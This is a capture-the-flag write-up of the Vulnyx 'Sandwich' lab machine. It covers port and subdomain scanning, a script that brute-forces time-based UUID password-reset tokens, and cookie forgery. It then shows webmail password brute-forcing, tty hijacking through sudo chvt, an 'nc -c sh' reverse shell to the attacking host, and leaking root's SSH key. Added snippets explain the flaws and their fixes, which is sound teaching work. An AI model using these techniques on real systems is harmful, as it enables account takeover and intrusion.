Vulnyx machine Sandwich writeup

1. Scanning
└─$ sudo nmap -sT -p- -T4 192.168.31.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 03:44 EDT
Nmap scan report for sandwich (192.168.31.114)
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:23:FE:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
└─$ sudo nmap -sTCV -O -p22,80 192.168.31.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 03:44 EDT
Nmap scan report for sandwich (192.168.31.114)
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 4d:30:db:f3:d0:b5:b2:65:8d:3b:08:dc:56:2b:28:b9 (ECDSA)
|_ 256 16:9f:f2:7f:ca:5a:a2:03:65:9e:f1:09:ae:15:f7:8b (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Sandwich.nyx | Your Favorite Sandwiches!
MAC Address: 08:00:27:23:FE:FB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds
2. Web

The hostname clearly needs to be added to /etc/hosts:
192.168.31.114 sandwich.nyx
Subdomain fuzzing:
└─$ wfuzz -c -w ~/Desktop/dict/fuzzDicts-master/subdomainDicts/dic1.txt -u 'http://disguise.hmv' -H 'HOST: FUZZ.disguise.hmv' --hh 7844
The results show a webmail subdomain, which is added to the hosts file as well:
192.168.31.114 webmail.sandwich.nyx
After trying out the site, its functionality is as follows:
1. sandwich.nyx offers login, registration, password reset and making sandwiches. A registered user's email address must belong to the sandwich.nyx domain; a reset sends a reset link to the user's sandwich.nyx mailbox, and the user logs in to webmail.sandwich.nyx, opens the mailbox and clicks the link to set a new password. The token in the reset link is generated as a UUID.
2. webmail.sandwich.nyx offers registration and login; a user can log in to the mailbox they registered to read and send mail.
The vulnerable point is obvious:
A user first sends a request to reset their own password, then a request to reset the admin user's password, and finally one more request to reset their own password. The user's own mailbox then holds two tokens for resetting their own password. The admin's token itself is not visible, but UUID generation varies linearly with time, so the admin's token lies in the interval between the user's two tokens and can be brute-forced.
Register a user c@sandwich.nyx and write a script based on this idea:
#coding:utf8
import requests

url = 'http://sandwich.nyx/index.php'
# reset request for the account we control
data1 = {
    'email': 'c@sandwich.nyx',
    'reset_action': 1
}
# cookies1 is the session of the logged-in user c; the admin request goes out under a throwaway session id
cookies1 = {'PHPSESSID': 'gkcjkvctcn3d27ucvdh7nnfll4'}
cookies2 = {'PHPSESSID': 'aaaaaaaaaaaaaaaaaaaaaaaaaa'}
# reset request for the admin account
data2 = {
    'email': 'admin@sandwich.nyx',
    'reset_action': 1
}
# own reset, admin reset, own reset: the admin token is minted between the two tokens that land in c's mailbox
requests.post(url, cookies=cookies1, data=data1)
requests.post(url, cookies=cookies2, data=data2)
requests.post(url, cookies=cookies1, data=data1)
After running the script, two emails containing reset links appear in user c's mailbox:
Sender Subject Message Date
web@sandwich.nyx Password Reset Request Dear user,
A password reset request has been made for your account. Please use the following link to reset your password:
http://sandwich.nyx/resetpassword.php?token=4ed59840-11f5-11f0-8069-08002723fefb
If you did not request this, please ignore this email. 2025-04-05 10:09:33
web@sandwich.nyx Password Reset Request Dear user,
A password reset request has been made for your account. Please use the following link to reset your password:
http://sandwich.nyx/resetpassword.php?token=4ed77afc-11f5-11f0-8069-08002723fefb
If you did not request this, please ignore this email. 2025-04-05 10:09:33
The interval is therefore:
4ed59840 ~ 4ed77afc
Turn it into a wordlist:
└─$ cat gendict.py
# every time_low value between the two observed tokens, as 8 hex digits
for i in range(0x4ed59840, 0x4ed77afc):
    prefix = hex(i)[2:]
    print(prefix)
└─$ python3 gendict.py > dict.txt
└─$ wc -l dict.txt
123580 dict.txt
Brute-force the admin user's token with wfuzz:
└─$ wfuzz -c -w dict.txt -u 'http://sandwich.nyx/resetpassword.php' -d 'token=FUZZ-11f5-11f0-8069-08002723fefb&new_password=admin&confirm_password=admin' -b 'PHPSESSID=gkcjkvctcn3d27ucvdh7nnfll4' --hh 420
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://sandwich.nyx/resetpassword.php
Total requests: 123580
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000075721: 200 15 L 41 W 408 Ch "4ed6c008"
Total time: 0
Processed Requests: 123580
Filtered Requests: 123579
Requests/sec.: 0
When the run finishes, admin's password has been reset to admin and you can log in.
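As an added illustration that is not part of the original writeup, the following Python parses the two version-1 tokens quoted above to show why the search space was so small (and what else such a token leaks), and contrasts them with a token drawn from the OS CSPRNG; the function names are my own.

```python
import secrets
import uuid
from datetime import datetime, timedelta, timezone

# The two reset tokens the writeup received in the mailbox of c@sandwich.nyx
TOKEN_BEFORE = "4ed59840-11f5-11f0-8069-08002723fefb"
TOKEN_AFTER = "4ed77afc-11f5-11f0-8069-08002723fefb"

# RFC 4122 version-1 timestamps count 100 ns ticks since 1582-10-15 (UTC)
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def is_weak_reset_token(token: str) -> bool:
    """True when the token is a time-based (version 1) UUID, i.e. predictable."""
    try:
        return uuid.UUID(token).version == 1
    except ValueError:
        return False  # not a UUID at all; judge it by other rules


def uuid1_timestamp(token: str) -> datetime:
    """Recover the creation time embedded in a version-1 UUID."""
    return GREGORIAN_EPOCH + timedelta(microseconds=uuid.UUID(token).time // 10)


def uuid1_node(token: str) -> str:
    """Recover the 48-bit node field, normally the generating host's MAC address."""
    node = uuid.UUID(token).node
    return ":".join(f"{(node >> (8 * i)) & 0xff:02x}" for i in reversed(range(6)))


def candidate_window(token_before: str, token_after: str) -> int:
    """Distinct timestamps between two tokens: the number of guesses that bounds
    any token minted in between (the size of the writeup's wordlist)."""
    return uuid.UUID(token_after).time - uuid.UUID(token_before).time


def new_reset_token() -> str:
    """Safe replacement: 256 random bits from the OS CSPRNG, nothing to extrapolate.
    Store only a hash of it server-side and give it a short expiry."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    for tok in (TOKEN_BEFORE, TOKEN_AFTER):
        print(tok, "weak" if is_weak_reset_token(tok) else "ok",
              uuid1_timestamp(tok).isoformat(), uuid1_node(tok))
    print("window:", candidate_window(TOKEN_BEFORE, TOKEN_AFTER), "timestamps")
    print("replacement:", new_reset_token())
```

The node field of both tokens is the VirtualBox MAC nmap reported above, and the timestamps fall on 2025-04-05 08:09 UTC, matching the 10:09 local time in the mails.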

Unintended solution on the web side
The login page has a "remember me" option. Logging in as an ordinary user with "remember me" checked returns a rememberme cookie whose content is the user's email address. Change it to admin@sandwich.nyx, delete the PHPSESSID cookie and refresh the page: this also lands on admin's page.
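Added example, not code from the writeup or the target: the vulnerable pattern (the cookie value is the identity) next to a signed, expiring remember-me cookie that rejects the email swap described above. The secret and function names are constructed for this illustration.

```python
import base64
import hashlib
import hmac
import time

# Constructed secret for this example only; a real deployment loads it from config
SERVER_SECRET = b"example-only-secret-not-for-production"


def user_from_plain_cookie(cookie: str) -> str:
    """The pattern the writeup abused: the cookie value *is* the identity,
    so whoever edits the cookie chooses who they are."""
    return cookie


def make_remember_cookie(email: str, now: int, ttl: int = 30 * 86400,
                         secret: bytes = SERVER_SECRET) -> str:
    """email|expiry|HMAC-SHA256(secret, email|expiry), base64url encoded."""
    expires = now + ttl
    payload = f"{email}|{expires}"
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{payload}|{tag}".encode()).decode()


def user_from_signed_cookie(cookie: str, now: int,
                            secret: bytes = SERVER_SECRET):
    """Return the email the cookie vouches for, or None if forged or expired."""
    try:
        email, expires, tag = base64.urlsafe_b64decode(cookie).decode().rsplit("|", 2)
        expires = int(expires)
    except ValueError:  # bad base64/utf-8, wrong field count or non-numeric expiry
        return None
    expected = hmac.new(secret, f"{email}|{expires}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None  # payload edited without the server secret
    if now >= expires:
        return None  # stale cookie: bounds how long a stolen one stays useful
    return email


def with_email_swapped(cookie: str, old: str, new: str) -> str:
    """Re-encode a cookie with the email replaced: the edit the writeup made."""
    raw = base64.urlsafe_b64decode(cookie).decode().replace(old, new)
    return base64.urlsafe_b64encode(raw.encode()).decode()


if __name__ == "__main__":
    now = int(time.time())
    good = make_remember_cookie("c@sandwich.nyx", now)
    forged = with_email_swapped(good, "c@sandwich.nyx", "admin@sandwich.nyx")
    print("plain :", user_from_plain_cookie("admin@sandwich.nyx"))
    print("signed:", user_from_signed_cookie(good, now))
    print("forged:", user_from_signed_cookie(forged, now))
```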


After logging in as admin there is a download button that returns an Excel sheet of the sandwiches users have made; it contains the email addresses of five users.

I spent a lot of time here without any leads. In the end a more experienced player hinted that the mailbox passwords of these five users need to be brute-forced (the mail password, not the website password, which can be reset through the vulnerability).
└─$ wfuzz -c -w emails.txt -w ~/Desktop/dict/fuzzDicts-master/passwordDict/top3000.txt -u 'http://webmail.sandwich.nyx/login.php' -d 'email=FUZ1Z&password=FUZ2Z' --sc 302
This yields the credentials of one mailbox user:
matthygd_x@sandwich.nyx:qweasd
After logging in, the inbox contains SSH credentials sent by admin:
Sender Subject Message Date
admin@sandwich.nyx SSH user password matthygd_xy:tGCD9XIP03IHpSCDdoRu 2025-03-30 19:00:14
Logging in over SSH gives user.txt:
matthygd_xy@sandwich:~$ cat user.txt
c158efe*********************
Privilege escalation
Log in over SSH:
matthygd_xy@sandwich:~$ id
uid=1000(matthygd_xy) gid=1000(matthygd_xy) grupos=1000(matthygd_xy),100(users)
matthygd_xy@sandwich:~$ sudo -l
Matching Defaults entries for matthygd_xy on sandwich:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User matthygd_xy may run the following commands on sandwich:
(root) NOPASSWD: /bin/chvt
matthygd_xy@sandwich:~$
/bin/chvt is a Linux command; its name stands for "change virtual terminal", and it switches the active virtual terminal (VT).
Suppose you are currently on virtual terminal 2 and run:
/bin/chvt 1
This switches the current session to virtual terminal 1. If another user is logged in on virtual terminal 1, you will see that user's session.
The who command shows which users are currently logged in:
matthygd_xy@sandwich:~$ who
ll104567 tty20 2025-04-05 09:38
matthygd_xy pts/0 2025-04-05 13:15 (192.168.31.98)
matthygd_xy@sandwich:~$ w
13:17:09 up 3:39, 2 users, load average: 0,00, 0,00, 0,00
USER TTY DESDE LOGIN@ IDLE JCPU PCPU WHAT
ll104567 tty20 - 09:38 3:39m 0.00s ? -bash
matthygd pts/0 192.168.31.98 13:15 2.00s 0.01s ? w
Because the ordinary user matthygd_xy may run chvt via sudo, they can switch to another logged-in user's tty and take over that user's session:
sudo chvt 20
On the target's console this drops into ll104567's session:

From there, send a shell back to the attacking host:
nc -c sh 192.168.31.98 1234
Note that some keys on the target's console are mapped differently; for example, to type "-" you have to press "/".
└─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.31.98] from sandwich.nyx [192.168.31.114] 49942
script -qc /bin/bash /dev/null
ll104567@sandwich:~$ ^Z
zsh: suspended nc -lvp 1234
└─$ stty raw -echo;fg
[1] + continued nc -lvp 1234
reset xterm
ll104567@sandwich:~$ id
uid=1001(ll104567) gid=1001(ll104567) grupos=1001(ll104567),100(users)
ll104567@sandwich:~$ sudo -l
Matching Defaults entries for ll104567 on sandwich:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User ll104567 may run the following commands on sandwich:
(ALL) NOPASSWD: /opt/game.sh
ll104567@sandwich:~$
game.sh is a number-guessing game:
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
MAX=2000000
ATTEMPTS=$(/usr/bin/awk -v max="$MAX" 'BEGIN {printf "%d", (log(max)/log(2) + 0.999999)}')
/bin/echo "Hello! What is your name?"
read NAME
NUMBER=$(( ( RANDOM % MAX ) + 1 ))
/bin/echo "Well, $NAME, I'm thinking of a number between 1 and $MAX."
/bin/echo "You have $ATTEMPTS attempts to guess it."
ATTEMPTS_MADE=0
SECRET_FILE="/root/.ssh/id_rsa"
while [ $ATTEMPTS_MADE -lt $ATTEMPTS ]; do
    /bin/echo "Try to guess:"
    read GUESS
    # Validate that the input is a valid number
    if ! [[ "$GUESS" =~ ^[0-9]+$ ]]; then
        /bin/echo "Please, enter a valid number."
        continue
    fi
    ATTEMPTS_MADE=$((ATTEMPTS_MADE + 1))
    if [ $GUESS -lt $NUMBER ]; then
        /bin/echo "Your guess is too low."
    elif [ $GUESS -gt $NUMBER ]; then
        /bin/echo "Your guess is too high."
    else
        break
    fi
done
if [ $GUESS -eq $NUMBER ]; then
    /bin/echo "Good job, $NAME! You guessed my number in $ATTEMPTS_MADE attempts!"
    /bin/echo "Here's your reward:"
    /bin/cat "$SECRET_FILE"
else
    /bin/echo "No, the number I was thinking of was $NUMBER."
fi
ll104567@sandwich:~$
Guessing with binary search wins the game and prints root's private key:
......
Good job, 1000000! You guessed my number in 20 attempts!
Here's your reward:
-----BEGIN OPENSSH PRIVATE KEY-----
...
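Added example (not from the writeup): this Python reproduces game.sh's attempt budget and checks it against the worst case of the halving strategy used above, which is why the "reward" gate in front of /root/.ssh/id_rsa is no gate at all; the function names are my own.

```python
import math


def attempts_granted(max_value: int) -> int:
    """game.sh's budget: awk printf "%d" of log(max)/log(2) + 0.999999, truncated."""
    return int(math.log(max_value) / math.log(2) + 0.999999)


def play_binary_search(secret: int, max_value: int) -> int:
    """Guess a secret in 1..max_value by halving, as the writeup did; return the guess count."""
    lo, hi, guesses = 1, max_value, 0
    while lo <= hi:
        guess = (lo + hi) // 2
        guesses += 1
        if guess < secret:
            lo = guess + 1
        elif guess > secret:
            hi = guess - 1
        else:
            return guesses
    raise ValueError("secret outside 1..max_value")


def worst_case_guesses(max_value: int) -> int:
    """Play every possible secret and report the most guesses any of them needed
    (floor(log2(max_value)) + 1 for this search)."""
    return max(play_binary_search(s, max_value) for s in range(1, max_value + 1))


def reward_is_unconditional(max_value: int) -> bool:
    """True when the budget covers the worst case, so any player who halves always wins."""
    return attempts_granted(max_value) >= worst_case_guesses(max_value)


if __name__ == "__main__":
    MAX = 2000000  # the value hard-coded in game.sh
    print("budget for MAX:", attempts_granted(MAX))
    print("guesses for secrets 1 and MAX:",
          play_binary_search(1, MAX), play_binary_search(MAX, MAX))
    # exhaustive check on a small range; 2,000,000 secrets take a while in Python
    print("gate unconditional for 1000:", reward_is_unconditional(1000))
```

For MAX=2000000 the budget is 21 and the slowest secret (MAX itself) also takes exactly 21 guesses, so the sudo rule effectively hands out root's key to anyone who can run the script.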
Logging in with the key gives root.txt:
ll104567@sandwich:~$ ssh -i rootpriv.key root@localhost
Linux sandwich 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 30 20:14:35 2025 from 192.168.1.181
root@sandwich:~# cat root.txt
a4e728e****************